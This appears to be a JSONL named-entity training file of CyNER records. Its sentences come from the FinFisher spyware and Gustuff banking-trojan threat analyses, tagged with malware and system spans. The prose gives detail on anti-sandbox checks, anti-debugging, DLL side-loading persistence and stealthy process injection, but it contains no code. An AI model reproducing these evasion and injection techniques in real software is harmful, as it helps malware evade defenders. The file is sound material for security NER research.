3CE30F5FED4C67053379518EACFCF879 The parent process ’ s full image path is equal to its own process path If these initial checks are passed , the loader builds a complete IAT by reading four imported libraries from disk ( ntdll.dll", "spans": {}, "info": {"id": "cyner_train_000796", "source": "cyner_train"}} {"text": ", kernel32.dll , advapi32.dll , and version.dll ) and remapping them in memory .", "spans": {}, "info": {"id": "cyner_train_000797", "source": "cyner_train"}} {"text": "This technique makes use of debuggers and software breakpoints useless .", "spans": {}, "info": {"id": "cyner_train_000798", "source": "cyner_train"}} {"text": "A lot of additional anti-sandbox checks are performed in this exact order : Check that the malware is not executed under the root folder of a drive Check that the malware file is readable from an external source Check that the hash of base path is not 3D6D62AF1A7C8053DBC8E110A530C679 Check that the full malware path contains only human readable characters ( “ a-z ” , “ A-Z ” , and “ 0-9 ” ) Check that no node in the full path contains the MD5 string of the malware", "spans": {}, "info": {"id": "cyner_train_000802", "source": "cyner_train"}} {"text": "file Fingerprint the system and check the following registry values : HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid should not be “ 6ba1d002-21ed-4dbe-afb5-08cf8b81ca32 ” HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\DigitalProductId should not be “ 55274-649-6478953-23109 ” , “ A22-00001 ” , or “ 47220 ” HARDWARE\\Description\\System\\SystemBiosDate should not contain “ 01/02/03 ”", "spans": {}, "info": {"id": "cyner_train_000803", "source": "cyner_train"}} {"text": "Check that the mutex WininetStartupMutex0 does not already exist Check that no DLL whose base name has hash value of 0xC9CEF3E4 is mapped into the malware address space The hashes in these checks are most likely correspond to sandbox or security products that the FinFisher authors want to avoid .", 
"spans": {"MALWARE: FinFisher": [[264, 273]]}, "info": {"id": "cyner_train_000804", "source": "cyner_train"}} {"text": "For the hardware virtualization check , the loader obtains the hardware device list and checks if the MD5 of the vendor ID is equal to a predefined list .", "spans": {}, "info": {"id": "cyner_train_000806", "source": "cyner_train"}} {"text": "In our tests , the malware sample was able to easily detect both VMWare and Hyper-V environments through the detection of the virtualized peripherals ( for example , Vmware has VEN_15AD as vendor ID , HyperV has VMBus as bus name ) .", "spans": {"SYSTEM: VMWare": [[65, 71]], "SYSTEM: Hyper-V": [[76, 83]], "ORGANIZATION: Vmware": [[166, 172]]}, "info": {"id": "cyner_train_000807", "source": "cyner_train"}} {"text": "The loader ’ s anti-debugger code is based on the following three methods : The first call aims to destroy the debugger connection : NOTE : This call completely stops the execution of WinDbg and other debuggers The second call tries to detect the presence of a debugger : The final call tries to destroy the possibility of adding software breakpoint : Finally , if the loader is happy with all the checks done so far , based on the victim operating system ( 32 or 64-bit ) it proceeds to decrypt a set of fake bitmap resources ( stage 2", "spans": {}, "info": {"id": "cyner_train_000809", "source": "cyner_train"}} {"text": ") embedded in the executable and prepares the execution of a new layer of VM decoding .", "spans": {}, "info": {"id": "cyner_train_000810", "source": "cyner_train"}} {"text": "For the 64-bit stage 2 malware , the code execution is transferred from the loader using a well-known technique called Heaven ’ s Gate .", "spans": {}, "info": {"id": "cyner_train_000815", "source": "cyner_train"}} {"text": "In the next sections , for simplicity , we will continue the analysis only on the 64-bit payload .", "spans": {}, "info": {"id": "cyner_train_000816", "source": "cyner_train"}} {"text": 
"Heaven ’ s gate is still in use in 2017 Stage 2 : A second multi-platform virtual machine The 64-bit stage 2 malware implements another loader combined with another virtual machine .", "spans": {}, "info": {"id": "cyner_train_000818", "source": "cyner_train"}} {"text": "The architecture is quite similar to the one described previously , but the opcodes are slightly different .", "spans": {}, "info": {"id": "cyner_train_000819", "source": "cyner_train"}} {"text": "INDEX MNEMONIC DESCRIPTION 0x0 JMP Special obfuscated conditional Jump ( always taken or always ignored ) 0x1 JMP Jump to a function ( same as opcode 0x10 ) 0x2 CALL Call to the function pointed by the internal VM value 0x3 CALL Optimized CALL function ( like the 0x1E opcode of the 32-bit VM ) 0x4 EXEC Execute code and move to the next packet 0x5 JMP Jump to an internal function 0x6 NOP No operation , move to the", "spans": {}, "info": {"id": "cyner_train_000821", "source": "cyner_train"}} {"text": "next packet 0x7 CALL Call an imported API ( whose address is stored in the internal VM value ) 0x8 LOAD Load a value into the VM descriptor structure * 0x9 STORE Store the internal VM value inside a register 0xA WRITE Resolve a pointer and store the value of a register in its content 0xB READ Move the value pointed by the VM internal value into a register 0xC LOAD Load a value into the VM descriptor structure ( not optimized ) 0xD CMP Compare the value pointed by the internal VM descriptor", "spans": {}, "info": {"id": "cyner_train_000822", "source": "cyner_train"}} {"text": "with a register 0xE CMP Compare the value pointed by the internal VM descriptor with an immediate value 0xF XCHG Exchange the value pointed by the internal VM descriptor with a register 0x10 SHL Jump to a function ( same as opcode 0x1 ) This additional virtual machine performs the same duties as the one already described but in a 64-bit environment .", "spans": {}, "info": {"id": "cyner_train_000823", "source": "cyner_train"}} {"text": 
"The extraction method is the same , but the encryption algorithm ( also XOR ) is much simpler .", "spans": {}, "info": {"id": "cyner_train_000825", "source": "cyner_train"}} {"text": "The new payload is decrypted , remapped , and executed in memory , and represents the installation and persistence stage of the malware .", "spans": {}, "info": {"id": "cyner_train_000826", "source": "cyner_train"}} {"text": "It is the first plain stage that does not employ a VM or obfuscation .", "spans": {}, "info": {"id": "cyner_train_000828", "source": "cyner_train"}} {"text": "The code supports two different installation methods : setup in a UAC-enforced environment ( with limited privileges ) , or an installation with full-administrative privileges enabled ( in cases where the malware gains the ability to run with elevated permissions ) .", "spans": {"SYSTEM: UAC-enforced environment": [[66, 90]]}, "info": {"id": "cyner_train_000829", "source": "cyner_train"}} {"text": "We were a bit disappointed that we did not see traces of a true privilege escalation exploit after all this deobfuscation work , but it seems these FinFisher samples were designed to work just using UAC bypasses .", "spans": {"VULNERABILITY: privilege escalation exploit": [[64, 92]], "MALWARE: FinFisher": [[148, 157]]}, "info": {"id": "cyner_train_000830", "source": "cyner_train"}} {"text": "The setup code receives an installation command from the previous stage .", "spans": {}, "info": {"id": "cyner_train_000831", "source": "cyner_train"}} {"text": "The malware creates a global event named 0x0A7F1FFAB12BB2 and drops some files under a folder located in C : \\ProgramData or in the user application data folder .", "spans": {}, "info": {"id": "cyner_train_000833", "source": "cyner_train"}} {"text": "The name of the folder and the malware configuration are read from a customized configuration file stored in the resource section of the setup program .", "spans": {}, "info": {"id": "cyner_train_000834", "source": 
"cyner_train"}} {"text": "Here the list of the files potentially dropped during the installation stage : FILE NAME STAGE DESCRIPTION d3d9.dll Stage 4 Malware loader used for UAC environments with limited privileges ; also protected by VM obfuscation aepic.dll , sspisrv.dll , userenv.dll Stage 4 Malware loader used in presence of administrative privileges ; executed from ( and injected into ) a fake service ; also protected by VM obfuscation msvcr90.dll Stage 5 Malware payload injected into", "spans": {}, "info": {"id": "cyner_train_000835", "source": "cyner_train"}} {"text": "the explorer.exe or winlogon.exe process ; also protected by VM obfuscation .cab Config Main configuration file ; encrypted setup.cab Unknown Last section of the setup executable ; content still unknown .7z Plugin Malware plugin used to spy the victim network communications wsecedit.rar Stage 6 Main malware executable After writing some of these files , the malware decides which kind of installation to perform based on the current privilege provided by the hosting process ( for example , if a Microsoft Office process was used as exploit vector ) : Installation process under", "spans": {"SYSTEM: Microsoft Office": [[498, 514]]}, "info": {"id": "cyner_train_000836", "source": "cyner_train"}} {"text": "UAC When running under a limited UAC account , the installer extracts d3d9.dll and creates a persistence key under HKCU\\Software\\Microsoft\\Windows\\Run .", "spans": {}, "info": {"id": "cyner_train_000837", "source": "cyner_train"}} {"text": "The malware sets a registry value ( whose name is read from the configuration file ) to “ C : \\Windows\\system32\\rundll32.exe c : \\ProgramData\\AuditApp\\d3d9.dll , Control_Run ” .", "spans": {}, "info": {"id": "cyner_train_000838", "source": "cyner_train"}} {"text": "Before doing this , the malware makes a screenshot of the screen and displays it on top of all other windows for few seconds .", "spans": {"SYSTEM: windows": [[101, 108]]}, "info": {"id": 
"cyner_train_000839", "source": "cyner_train"}} {"text": "In this case the persistence is achieved by loading the original explorer.exe from its startup location and , using DLL side-loading , passing the execution control to the stage 4 malware ( discussed in next section ) .", "spans": {}, "info": {"id": "cyner_train_000842", "source": "cyner_train"}} {"text": "Finally , the malware spawns a thread that has the goal to load , remap , and relocate the stage 5 malware .", "spans": {}, "info": {"id": "cyner_train_000843", "source": "cyner_train"}} {"text": "The msvcr90.dll file is opened , read , and decrypted , and the code execution control is transferred to the RunDll exported routine .", "spans": {}, "info": {"id": "cyner_train_000845", "source": "cyner_train"}} {"text": "The method is a well-known trick used by penetration testers that was automated and generalized by FinFisher The procedure starts by enumerating the KnownDlls object directory and then scanning for section objects of the cached system DLLs .", "spans": {"MALWARE: FinFisher": [[99, 108]]}, "info": {"id": "cyner_train_000848", "source": "cyner_train"}} {"text": "Next , the malware enumerates all .exe programs in the % System % folder and looks for an original signed Windows binary that imports from at least one KnownDll and from a library that is not in the KnownDll directory .", "spans": {"SYSTEM: Windows": [[106, 113]]}, "info": {"id": "cyner_train_000849", "source": "cyner_train"}} {"text": "When a suitable .exe file candidate is found , it is copied into the malware installation folder ( for example , C : \\ProgramData ) .", "spans": {}, "info": {"id": "cyner_train_000850", "source": "cyner_train"}} {"text": "It then calls a routine that adds a code section to a target module .", "spans": {}, "info": {"id": "cyner_train_000852", "source": "cyner_train"}} {"text": "At the time of writing , the dropper supports aepic.dll , sspisrv.dll , ftllib.dll , and userenv.dll to host the malicious 
FinFisher payload .", "spans": {"MALWARE: FinFisher": [[123, 132]]}, "info": {"id": "cyner_train_000854", "source": "cyner_train"}} {"text": "Finally , a new Windows service is created with the service path pointing to the candidate .exe located in this new directory together with the freshly created , benign-looking DLL .", "spans": {"SYSTEM: Windows": [[16, 23]]}, "info": {"id": "cyner_train_000855", "source": "cyner_train"}} {"text": "In this way , when the service runs during boot , the original Windows executable is executed from a different location and it will automatically load and map the malicious DLL inside its address space , instead of using the genuine system library .", "spans": {"SYSTEM: Windows": [[63, 70]]}, "info": {"id": "cyner_train_000856", "source": "cyner_train"}} {"text": "This routine is a form of generic and variable generator of DLL side-loading combinations .", "spans": {}, "info": {"id": "cyner_train_000857", "source": "cyner_train"}} {"text": "Windows Defender ATP timeline can pinpoint the service DLL side-loading trick ( in this example , using fltlib.dll ) .", "spans": {"SYSTEM: Windows Defender ATP": [[0, 20]]}, "info": {"id": "cyner_train_000859", "source": "cyner_train"}} {"text": "In the past , we have seen other activity groups like LEAD employ a similar attacker technique named “ proxy-library ” to achieve persistence , but not with this professionalism .", "spans": {}, "info": {"id": "cyner_train_000860", "source": "cyner_train"}} {"text": "The DLL side-loaded stage 4 malware mimicking a real export table to avoid detection Stage 4 : The memory loader – Fun injection with GDI function hijacking Depending on how stage 4 was launched , two different things may happen : In the low-integrity case ( under UAC ) the installer simply injects the stage 5 malware into the bogus explorer.exe process started earlier and terminates In the high-integrity case ( with administrative privileges or after UAC bypass ) , the code searches for 
the process hosting the Plug and Play service ( usually svchost.exe", "spans": {}, "info": {"id": "cyner_train_000864", "source": "cyner_train"}} {"text": ") loaded in memory and injects itself into it For the second scenario , the injection process works like this : The malware opens the target service process .", "spans": {}, "info": {"id": "cyner_train_000865", "source": "cyner_train"}} {"text": "It allocates and fills four chunks of memory inside the service process .", "spans": {}, "info": {"id": "cyner_train_000866", "source": "cyner_train"}} {"text": "One chunk contains the entire malware DLL code ( without PE headers ) .", "spans": {}, "info": {"id": "cyner_train_000867", "source": "cyner_train"}} {"text": "Another chunk is used to copy a basic Ntdll and Kernel32 import address table .", "spans": {}, "info": {"id": "cyner_train_000868", "source": "cyner_train"}} {"text": "Two chunks are filled with an asynchronous procedure call ( APC ) routine code and a stub .", "spans": {}, "info": {"id": "cyner_train_000869", "source": "cyner_train"}} {"text": "It opens the service thread of the service process and uses the ZwQueueApcThread native API to inject an APC .", "spans": {}, "info": {"id": "cyner_train_000870", "source": "cyner_train"}} {"text": "The APC routine creates a thread in the context of the svchost.exe process that will map and execute the stage 5 malware into the winlogon.exe process .", "spans": {}, "info": {"id": "cyner_train_000871", "source": "cyner_train"}} {"text": "The injection method used for winlogon.exe is also interesting and quite unusual .", "spans": {}, "info": {"id": "cyner_train_000872", "source": "cyner_train"}} {"text": "We believe that this method is engineered to avoid trivial detection of process injection using the well-detected CreateRemoteThread or ZwQueueApcThread API .", "spans": {}, "info": {"id": "cyner_train_000873", "source": "cyner_train"}} {"text": "The malware takes these steps : Check if the system master boot 
record ( MBR ) contains an infection marker ( 0xD289C989C089 8-bytes value at offset 0x2C ) , and , if so , terminate itself Check again if the process is attached to a debugger ( using the techniques described previously ) Read , decrypt , and map the stage 5 malware ( written in the previous stage in msvcr90.dll ) Open winlogon.exe process Load user32.dll system library and read the KernelCallbackTable", "spans": {}, "info": {"id": "cyner_train_000874", "source": "cyner_train"}} {"text": "pointer from its own process environment block ( PEB ) ( Note : The KernelCallbackTable points to an array of graphic functions used by Win32 kernel subsystem module win32k.sys as call-back into user-mode .", "spans": {}, "info": {"id": "cyner_train_000875", "source": "cyner_train"}} {"text": ") Calculate the difference between this pointer and the User32 base address .", "spans": {}, "info": {"id": "cyner_train_000876", "source": "cyner_train"}} {"text": "Copy the stage 5 DLL into winlogon.exe Allocate a chunk of memory in winlogon.exe process and copy the same APC routine seen previously Read and save the original pointer of the __fnDWORD internal User32 routine ( located at offset +0x10 of the KernelCallbackTable ) and replace this pointer with the address of the APC stub routine After this function pointer hijacking , when winlogon.exe makes any graphical call ( GDI ) , the malicious code can execute without using CreateRemoteThread or", "spans": {}, "info": {"id": "cyner_train_000877", "source": "cyner_train"}} {"text": "similar triggers that are easily detectable .", "spans": {}, "info": {"id": "cyner_train_000878", "source": "cyner_train"}} {"text": "After execution it takes care of restoring the original KernelCallbackTable .", "spans": {}, "info": {"id": "cyner_train_000879", "source": "cyner_train"}} {"text": "Stage 5 : The final loader takes control The stage 5 malware is needed only to provide one more layer of obfuscation , through the VM , of the final malware 
payload and to set up a special Structured Exception Hander routine , which is inserted as Wow64PrepareForException in Ntdll .", "spans": {}, "info": {"id": "cyner_train_000880", "source": "cyner_train"}} {"text": "This special exception handler is needed to manage some memory buffers protection and special exceptions that are used to provide more stealthy execution .", "spans": {}, "info": {"id": "cyner_train_000881", "source": "cyner_train"}} {"text": "After the VM code has checked again the user environment , it proceeds to extract and execute the final un-obfuscated payload sample directly into winlogon.exe ( alternatively , into explorer.exe ) process .", "spans": {}, "info": {"id": "cyner_train_000882", "source": "cyner_train"}} {"text": "The latter implements the entire spyware program .", "spans": {}, "info": {"id": "cyner_train_000884", "source": "cyner_train"}} {"text": "Stage 6 : The payload is a modular spyware framework for further analysis Our journey to deobfuscating FinFisher has allowed us to uncover the complex anti-analysis techniques used by this malware , as well as to use this intel to protect our customers , which is our top priority .", "spans": {"MALWARE: FinFisher": [[103, 112]]}, "info": {"id": "cyner_train_000885", "source": "cyner_train"}} {"text": "Analysis of the additional spyware modules is future work .", "spans": {}, "info": {"id": "cyner_train_000886", "source": "cyner_train"}} {"text": "It is evident that the ultimate goal of this program is to steal information .", "spans": {}, "info": {"id": "cyner_train_000887", "source": "cyner_train"}} {"text": "The plugins are stored in its resource section and can be protected by the same VM .", "spans": {}, "info": {"id": "cyner_train_000889", "source": "cyner_train"}} {"text": "The sample we analyzed in October , for example , contains a plugin that is able to spy on internet connections , and can even divert some SSL connections and steal data from encrypted traffic .", "spans": {}, 
"info": {"id": "cyner_train_000890", "source": "cyner_train"}} {"text": "Describing this additional piece of code in detail is outside the scope of this analysis and may require a new dedicated blog post .", "spans": {"SYSTEM: scope": [[66, 71]]}, "info": {"id": "cyner_train_000893", "source": "cyner_train"}} {"text": "Windows 10 S devices are naturally protected against FinFisher and other threats thanks to the strong code integrity policies that don ’ t allow unknown unsigned binaries to run ( thus stopping FinFisher ’ s PE installer ) or loaded ( blocking FinFisher ’ s DLL persistence ) .", "spans": {"SYSTEM: Windows 10": [[0, 10]], "MALWARE: FinFisher": [[53, 62], [194, 203], [244, 253]]}, "info": {"id": "cyner_train_000895", "source": "cyner_train"}} {"text": "Office 365 ATP blocks unsafe attachments , malicious links , and linked-to files using time-of-click protection .", "spans": {"SYSTEM: Office 365 ATP": [[0, 14]]}, "info": {"id": "cyner_train_000898", "source": "cyner_train"}} {"text": "Using intel from this research , we have made Office 365 ATP more resistant to FinFisher ’ s anti-sandbox checks .", "spans": {"SYSTEM: Office 365 ATP": [[46, 60]], "MALWARE: FinFisher": [[79, 88]]}, "info": {"id": "cyner_train_000899", "source": "cyner_train"}} {"text": "Generic detections , advanced behavioral analytics , and machine learning technologies in Windows Defender Advanced Threat Protection detect FinFisher ’ s malicious behavior throughout the attack kill chain and alert SecOps personnel .", "spans": {"SYSTEM: Windows Defender Advanced Threat Protection": [[90, 133]], "MALWARE: FinFisher": [[141, 150]]}, "info": {"id": "cyner_train_000900", "source": "cyner_train"}} {"text": "Windows Defender ATP also integrates with the Windows protection stack so that protections from Windows Defender AV and Windows Defender Exploit Guard are reported in Windows Defender ATP portal , enabling SecOps personnel to centrally manage security , and as well as promptly 
investigate and respond to hostile activity in the network .", "spans": {"SYSTEM: Windows Defender ATP": [[0, 20], [167, 187]], "SYSTEM: Windows": [[46, 53]], "SYSTEM: Windows Defender AV": [[96, 115]], "SYSTEM: Windows Defender Exploit Guard": [[120, 150]]}, "info": {"id": "cyner_train_000901", "source": "cyner_train"}} {"text": "We hope that this writeup of our journey through all the multiple layers of protection , obfuscation , and anti-analysis techniques of FinFisher will be useful to other researchers studying this malware .", "spans": {"MALWARE: FinFisher": [[135, 144]]}, "info": {"id": "cyner_train_000902", "source": "cyner_train"}} {"text": "We believe that an industry-wide collaboration and information-sharing is important in defending customers against this complex piece of malware .", "spans": {}, "info": {"id": "cyner_train_000903", "source": "cyner_train"}} {"text": "TUESDAY , APRIL 9 , 2019 Gustuff banking botnet targets Australia EXECUTIVE SUMMARY Cisco Talos has uncovered a new Android-based campaign targeting Australian financial institutions .", "spans": {"MALWARE: Gustuff": [[25, 32]], "ORGANIZATION: Cisco Talos": [[84, 95]], "SYSTEM: Android-based": [[116, 129]]}, "info": {"id": "cyner_train_000904", "source": "cyner_train"}} {"text": "Although this malware 's credential-harvest mechanism is not particularly sophisticated , it does have an advanced self-preservation mechanism .", "spans": {}, "info": {"id": "cyner_train_000906", "source": "cyner_train"}} {"text": "Aside from the credential stealing , this malware also includes features like the theft of users ' contact list , collecting phone numbers associated names , and files and photos on the device .", "spans": {}, "info": {"id": "cyner_train_000908", "source": "cyner_train"}} {"text": "But that does n't mean companies and organizations are out of the woods .", "spans": {}, "info": {"id": "cyner_train_000909", "source": "cyner_train"}} {"text": "They should still be on the lookout for 
these kinds of trojans , as the attackers could target corporate accounts that contain large amounts of money .", "spans": {}, "info": {"id": "cyner_train_000910", "source": "cyner_train"}} {"text": "A motivated attacker can use this trojan to harvest usernames and passwords and then reuse them to login into the organization 's system where the victim works .", "spans": {}, "info": {"id": "cyner_train_000912", "source": "cyner_train"}} {"text": "Corporations can protect themselves from these side-channel attacks by deploying client-based two-factor authentication , such as Duo Security .", "spans": {"SYSTEM: Duo Security": [[130, 142]]}, "info": {"id": "cyner_train_000914", "source": "cyner_train"}} {"text": "One of the most impressive features of this malware is its resilience .", "spans": {}, "info": {"id": "cyner_train_000915", "source": "cyner_train"}} {"text": "If the command and control ( C2 ) server is taken down , the malicious operator can still recover the malware control by sending SMS messages directly to the infected devices .", "spans": {}, "info": {"id": "cyner_train_000916", "source": "cyner_train"}} {"text": "This makes the taking down and recovery of the network much harder and poses a considerable challenge for defenders .", "spans": {}, "info": {"id": "cyner_train_000917", "source": "cyner_train"}} {"text": "THE CAMPAIGN The malware 's primary infection vector is SMS .", "spans": {}, "info": {"id": "cyner_train_000918", "source": "cyner_train"}} {"text": "Just like the old-school mail worms that used the victim 's address book to select the next victims , this banking trojan 's activation cycle includes the exfiltration of the victim 's address book .", "spans": {"SYSTEM: address book": [[60, 72]]}, "info": {"id": "cyner_train_000919", "source": "cyner_train"}} {"text": "The trojan will receive instructions from the C2 to spread .", "spans": {}, "info": {"id": "cyner_train_000920", "source": "cyner_train"}} {"text": "Usually , this message 
targets four or five people at a time .", "spans": {}, "info": {"id": "cyner_train_000922", "source": "cyner_train"}} {"text": "The body contains a message and URL .", "spans": {}, "info": {"id": "cyner_train_000923", "source": "cyner_train"}} {"text": "Again , the concept is that new victims are more likely to install the malware if the SMS comes from someone they know .", "spans": {}, "info": {"id": "cyner_train_000924", "source": "cyner_train"}} {"text": "When a victim tries to access the URL in the SMS body , the C2 will check if the mobile device meets the criteria to receive the malware ( see infrastructure section ) .", "spans": {}, "info": {"id": "cyner_train_000925", "source": "cyner_train"}} {"text": "However , Talos has identified that was used at least since November 2018 .", "spans": {"ORGANIZATION: Talos": [[10, 15]]}, "info": {"id": "cyner_train_000928", "source": "cyner_train"}} {"text": "During the investigation , Talos was also able to determine that the same infrastructure has been used to deploy similar campaigns using different versions of the malware .", "spans": {"ORGANIZATION: Talos": [[27, 32]]}, "info": {"id": "cyner_train_000929", "source": "cyner_train"}} {"text": "Distribution of victims .", "spans": {}, "info": {"id": "cyner_train_000930", "source": "cyner_train"}} {"text": "Talos assess with high confidence that this campaign is targeting Australian financial institutions based on several factors .", "spans": {"ORGANIZATION: Talos": [[0, 5]]}, "info": {"id": "cyner_train_000931", "source": "cyner_train"}} {"text": "Our Umbrella telemetry shows that the majority of the request comes from Australia and the majority of the phone numbers infected have the international indicative for Australia .", "spans": {}, "info": {"id": "cyner_train_000932", "source": "cyner_train"}} {"text": "Finally , the specific overlays are designed for Australian financial institutions , and Australia is one of the geographic regions that is accepted by the C2 
.", "spans": {}, "info": {"id": "cyner_train_000933", "source": "cyner_train"}} {"text": "Our data shows , on average , about three requests per hour to the drop host .", "spans": {}, "info": {"id": "cyner_train_000935", "source": "cyner_train"}} {"text": "This data , when analyzed with the number of commands to send SMSs that Talos received during the investigation , lead us to conclude that the malicious operator is aggressively spreading the malware , but that does n't seem to result in the same number of new infections .", "spans": {}, "info": {"id": "cyner_train_000937", "source": "cyner_train"}} {"text": "While doing our investigation we were able to identify other malware packages with different names .", "spans": {}, "info": {"id": "cyner_train_000939", "source": "cyner_train"}} {"text": "Some of these might have been used on old campaigns or were already prepared for new campaigns .", "spans": {}, "info": {"id": "cyner_train_000940", "source": "cyner_train"}} {"text": "MALWARE TECHNICAL DETAILS During our investigation , researchers uncovered a malware known as \" Gustuff. 
'' .", "spans": {"MALWARE: Gustuff.": [[96, 104]]}, "info": {"id": "cyner_train_000941", "source": "cyner_train"}} {"text": "Given the lack of indicators of compromise , we decided to check to see if this was the same malware we had been researching .", "spans": {}, "info": {"id": "cyner_train_000942", "source": "cyner_train"}} {"text": "Our Threat Intelligence and Interdiction team found the Gustuff malware being advertised in the Exploit.in forum as a botnet for rent .", "spans": {"MALWARE: Gustuff": [[56, 63]]}, "info": {"id": "cyner_train_000943", "source": "cyner_train"}} {"text": "The seller , known as \" bestoffer , '' was , at some point , expelled from the forum .", "spans": {}, "info": {"id": "cyner_train_000944", "source": "cyner_train"}} {"text": "Gustuff advertising screenshot The companies advertised in the image above were from Australia , which matches up with the campaign we researched .", "spans": {"MALWARE: Gustuff": [[0, 7]]}, "info": {"id": "cyner_train_000945", "source": "cyner_train"}} {"text": "The screenshots provided by the author align with the advertised features and the features that we discovered while doing our analysis .", "spans": {}, "info": {"id": "cyner_train_000946", "source": "cyner_train"}} {"text": "Admin panel The administration panel shows the application configuration , which matches the commands from the C2 .", "spans": {}, "info": {"id": "cyner_train_000947", "source": "cyner_train"}} {"text": "Country selection The administration console screenshots also show the ability to filter the results by country .", "spans": {}, "info": {"id": "cyner_train_000948", "source": "cyner_train"}} {"text": "In this case , \" AU '' is the code shown , which is Australia .", "spans": {}, "info": {"id": "cyner_train_000949", "source": "cyner_train"}} {"text": "Design In the manifest , the malware requests a large number of permissions .", "spans": {}, "info": {"id": "cyner_train_000951", "source": "cyner_train"}} {"text": "However , it 
does n't request permissions like BIND_ADMIN .", "spans": {}, "info": {"id": "cyner_train_000952", "source": "cyner_train"}} {"text": "Permissions in the manifest This malware is designed to avoid detection and analysis .", "spans": {}, "info": {"id": "cyner_train_000954", "source": "cyner_train"}} {"text": "The code is not only obfuscated but also packed .", "spans": {}, "info": {"id": "cyner_train_000956", "source": "cyner_train"}} {"text": "The packer , besides making the static analysis more complex , will break the standard debugger .", "spans": {}, "info": {"id": "cyner_train_000957", "source": "cyner_train"}} {"text": "Manifest activity declaration Class list inside the dex file The main malware classes are packed , to a point where the class defined in the manifest has a handler for the MAIN category that does not exist in the DEX file .", "spans": {}, "info": {"id": "cyner_train_000958", "source": "cyner_train"}} {"text": "Error when trying to debug the malware using the Android Studio IDE .", "spans": {"SYSTEM: Android Studio IDE": [[49, 67]]}, "info": {"id": "cyner_train_000959", "source": "cyner_train"}} {"text": "One of the side effects of this packer is the inability of Android Studio IDE to debug the code .", "spans": {"SYSTEM: Android Studio IDE": [[59, 77]]}, "info": {"id": "cyner_train_000960", "source": "cyner_train"}} {"text": "Since the class does not exist at startup , the application does not run on the debugger .", "spans": {}, "info": {"id": "cyner_train_000962", "source": "cyner_train"}} {"text": "Check code for emulators As part of its defense , the malware payload first checks for emulators to prevent analysis on sandboxes .", "spans": {}, "info": {"id": "cyner_train_000964", "source": "cyner_train"}} {"text": "It checks for different kinds of emulators , including QEMU , Genymotion , BlueStacks and Bignox .", "spans": {"SYSTEM: QEMU": [[55, 59]], "SYSTEM: Genymotion": [[62, 72]], "SYSTEM: BlueStacks": [[75, 85]], "SYSTEM: Bignox": [[90, 
96]]}, "info": {"id": "cyner_train_000965", "source": "cyner_train"}} {"text": "If the malware determines that is not running on an emulator , it then performs additional checks to ensure that it wo n't be detected .", "spans": {}, "info": {"id": "cyner_train_000966", "source": "cyner_train"}} {"text": "Code to check the existence of SafetyNet Google API It also checks if the Android SafetyNet is active and reporting back to the C2 .", "spans": {"SYSTEM: Google API": [[41, 51]], "SYSTEM: Android": [[74, 81]]}, "info": {"id": "cyner_train_000967", "source": "cyner_train"}} {"text": "This helps the C2 define what actions it can do before being detected on the mobile device .", "spans": {}, "info": {"id": "cyner_train_000968", "source": "cyner_train"}} {"text": "The trojan uses the Android Accessibility API to intercept all interactions between the user and the mobile device .", "spans": {"SYSTEM: Android Accessibility": [[20, 41]]}, "info": {"id": "cyner_train_000970", "source": "cyner_train"}} {"text": "For example , when a button is clicked , a view is focused , etc .", "spans": {}, "info": {"id": "cyner_train_000972", "source": "cyner_train"}} {"text": "'' For each interaction , the malware will check if the generator is a package that belongs to the anti-virus list , the malware will abuse another feature of the Accessibility API .", "spans": {"SYSTEM: Accessibility API": [[163, 180]]}, "info": {"id": "cyner_train_000973", "source": "cyner_train"}} {"text": "There is a function called \" performGlobalAction '' with the description below .", "spans": {}, "info": {"id": "cyner_train_000974", "source": "cyner_train"}} {"text": "Android documentation describes that function as \" a global action .", "spans": {"SYSTEM: Android": [[0, 7]]}, "info": {"id": "cyner_train_000975", "source": "cyner_train"}} {"text": "For example , going back , going home , opening recents , etc .", "spans": {}, "info": {"id": "cyner_train_000977", "source": "cyner_train"}} {"text": "'' The 
trojan calls this function with the action GLOBAL_ACTION_BACK , which equals the pressing of the back button on the device , thus canceling the opening of the anti-virus application .", "spans": {}, "info": {"id": "cyner_train_000978", "source": "cyner_train"}} {"text": "The same event interception is used to place the webview overlay when the user tries to access the targeted applications , allowing it to display its overlay , thus intercepting the credentials .", "spans": {}, "info": {"id": "cyner_train_000979", "source": "cyner_train"}} {"text": "The beaconing only starts after the application is installed and removed from the running tasks .", "spans": {}, "info": {"id": "cyner_train_000980", "source": "cyner_train"}} {"text": "Beaconing information The ID is generated for each installation of the malware , while the token remains unique .", "spans": {}, "info": {"id": "cyner_train_000981", "source": "cyner_train"}} {"text": "The beaconing is sent to the URL http : // /api/v2/get.php with an interval of 60 seconds .", "spans": {}, "info": {"id": "cyner_train_000983", "source": "cyner_train"}} {"text": "Answer from the C2 The C2 will check the country field , if it 's empty or if the country is not targeted , it will reply with a \" Unauthorized '' answer .", "spans": {}, "info": {"id": "cyner_train_000984", "source": "cyner_train"}} {"text": "List of available commands The command names are self-explanatory .", "spans": {}, "info": {"id": "cyner_train_000986", "source": "cyner_train"}} {"text": "It is a custom obfuscation partly based on base85 encoding , which is in itself unusual , in malware .", "spans": {}, "info": {"id": "cyner_train_000988", "source": "cyner_train"}} {"text": "Activation cycle As we have explained above , the malware has several defence mechanisms .", "spans": {}, "info": {"id": "cyner_train_000990", "source": "cyner_train"}} {"text": "Beside the obfuscation and the environment checks , the malware also has some interesting anti-sandbox 
mechanisms .", "spans": {}, "info": {"id": "cyner_train_000991", "source": "cyner_train"}} {"text": "The user needs to press the \" close '' button to finish the installation .", "spans": {}, "info": {"id": "cyner_train_000993", "source": "cyner_train"}} {"text": "However , this wo n't close the application , it will send it to the background , instead .", "spans": {}, "info": {"id": "cyner_train_000994", "source": "cyner_train"}} {"text": "The beaconing will only start after the application is removed from the background , ultimately stopping it .", "spans": {}, "info": {"id": "cyner_train_000996", "source": "cyner_train"}} {"text": "This will be the trigger for the service to start the beaconing .", "spans": {}, "info": {"id": "cyner_train_000997", "source": "cyner_train"}} {"text": "As mentioned previously , the beaconing is done every 60 seconds .", "spans": {}, "info": {"id": "cyner_train_000998", "source": "cyner_train"}} {"text": "However , no command is received from the C2 until the inactiveTime field ( see beaconing information image above ) has at least the value of 2000000 .", "spans": {}, "info": {"id": "cyner_train_000999", "source": "cyner_train"}} {"text": "This time resets every time the user performs some activity .", "spans": {}, "info": {"id": "cyner_train_001000", "source": "cyner_train"}} {"text": "After the checks , the malware becomes active , but first , it goes through seven steps , each one calling a different command : uploadPhoneNumbers : Exfiltrates all phone numbers that are in the contact list .", "spans": {}, "info": {"id": "cyner_train_001001", "source": 